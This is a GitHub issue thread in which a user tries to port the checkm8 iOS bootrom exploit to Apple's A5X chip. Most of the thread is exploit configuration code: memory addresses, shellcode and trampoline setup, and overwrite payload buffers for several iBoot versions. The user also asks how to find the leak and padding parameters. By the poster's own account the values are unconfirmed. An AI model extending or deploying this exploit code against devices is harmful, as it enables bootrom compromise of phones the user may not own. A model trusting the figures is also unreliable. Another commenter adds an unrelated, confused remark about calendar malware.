Closed soulilya closed 1 year ago
Where i can get this values: https://github.com/axi0mX/ipwndfu/blob/0e28932ec6a2a570b10fd77e50bda4216418cd98/checkm8.py#L441
Hi how are you does this have to do will all the malware in my calendar. I had to change all my passwords. I'm so sorry if I messed up some how
Ok, I think now i found all values. Since tool unstable how i can test it for proper work? Right now i have only Windows 10 and WSL sadly... This is my findings on A5X, please confirm correctness someone:
if cpid == 0x8945:
constants_usb_s5l8945x = [
0x34000000, # 1 - LOAD_ADDRESS
0x65786563, # 2 - EXEC_MAGIC
0x646F6E65, # 3 - DONE_MAGIC
0x6D656D63, # 4 - MEMC_MAGIC
0x6D656D73, # 5 - MEMS_MAGIC
0x72F4+1, # 6 - USB_CORE_DO_IO
]
constants_checkm8_s5l8945x = [
0x3402D888, # 1 - gUSBDescriptors
0x3402DDE0, # 2 - gUSBSerialNumber
0x7878+1, # 3 - usb_create_string_descriptor
0x3402C1B4, # 4 - gUSBSRNMStringDescriptor
0x34039800, # 5 - PAYLOAD_DEST
PAYLOAD_OFFSET_ARMV7, # 6 - PAYLOAD_OFFSET
PAYLOAD_SIZE_ARMV7, # 7 - PAYLOAD_SIZE
0x3402D904, # 8 - PAYLOAD_PTR
]
s5l8945x_handler = asm_thumb_trampoline(0x34039800+1, 0x7D60+1) + prepare_shellcode('usb_0xA1_2_armv7', constants_usb_s5l8945x)[8:]
s5l8945x_shellcode = prepare_shellcode('checkm8_armv7', constants_checkm8_s5l8945x)
assert len(s5l8945x_shellcode) <= PAYLOAD_OFFSET_ARMV7
assert len(s5l8945x_handler) <= PAYLOAD_SIZE_ARMV7
return s5l8945x_shellcode + '\0' * (PAYLOAD_OFFSET_ARMV7 - len(s5l8945x_shellcode)) + s5l8945x_handler
def all_exploit_configs():
t8010_nop_gadget = 0x10000CC6C
t8011_nop_gadget = 0x10000CD0C
t8015_nop_gadget = 0x10000A9C4
s5l8945x_overwrite = '\0' * 0x6c0 + struct.pack('<20xI4x', 0x34000000)
s5l8947x_overwrite = '\0' * 0x660 + struct.pack('<20xI4x', 0x34000000)
s5l895xx_overwrite = '\0' * 0x640 + struct.pack('<20xI4x', 0x10000000)
t800x_overwrite = '\0' * 0x5C0 + struct.pack('<20xI4x', 0x48818000)
s5l8960x_overwrite = '\0' * 0x580 + struct.pack('<32xQ8x', 0x180380000)
t8010_overwrite = '\0' * 0x580 + struct.pack('<32x2Q16x32x2QI', t8010_nop_gadget, 0x1800B0800, t8010_nop_gadget, 0x1800B0800, 0xbeefbeef)
t8011_overwrite = '\0' * 0x500 + struct.pack('<32x2Q16x32x2QI', t8011_nop_gadget, 0x1800B0800, t8011_nop_gadget, 0x1800B0800, 0xbeefbeef)
t8015_overwrite = '\0' * 0x500 + struct.pack('<32x2Q16x32x2Q12xI', t8015_nop_gadget, 0x18001C020, t8015_nop_gadget, 0x18001C020, 0xbeefbeef)
return [
DeviceConfig('iBoot-1062.2', 0x8945, 620, s5l8945x_overwrite, None, None),
DeviceConfig('iBoot-1458.2', 0x8947, 626, s5l8947x_overwrite, None, None), # S5L8947 (DFU loop) 1.97 seconds
DeviceConfig('iBoot-1145.3' , 0x8950, 659, s5l895xx_overwrite, None, None), # S5L8950 (buttons) 2.30 seconds
DeviceConfig('iBoot-1145.3.3', 0x8955, 659, s5l895xx_overwrite, None, None), # S5L8955 (buttons) 2.30 seconds
DeviceConfig('iBoot-1704.10', 0x8960, 7936, s5l8960x_overwrite, None, None), # S5L8960 (buttons) 13.97 seconds
DeviceConfig('iBoot-2651.0.0.1.31', 0x8002, None, t800x_overwrite, 5, 1), # T8002 (DFU loop) NEW: 1.27 seconds
DeviceConfig('iBoot-2651.0.0.3.3', 0x8004, None, t800x_overwrite, 5, 1), # T8004 (buttons) NEW: 1.06 seconds
DeviceConfig('iBoot-2696.0.0.1.33', 0x8010, None, t8010_overwrite, 5, 1), # T8010 (buttons) NEW: 0.68 seconds
DeviceConfig('iBoot-3135.0.0.2.3', 0x8011, None, t8011_overwrite, 6, 1), # T8011 (buttons) NEW: 0.87 seconds
DeviceConfig('iBoot-3332.0.0.1.23', 0x8015, None, t8015_overwrite, 6, 1), # T8015 (DFU loop) NEW: 0.66 seconds
]
Hallo. I try to develop checkm8 for A5X. All addresses for nessery constants and functions i allready find (usb and magic addresses). I tryed to figure out with leak, requests qty and padding, but cant sniff usb. How i can do it thru source code Secure Rom?And tell me please if theres somthing else... Thanks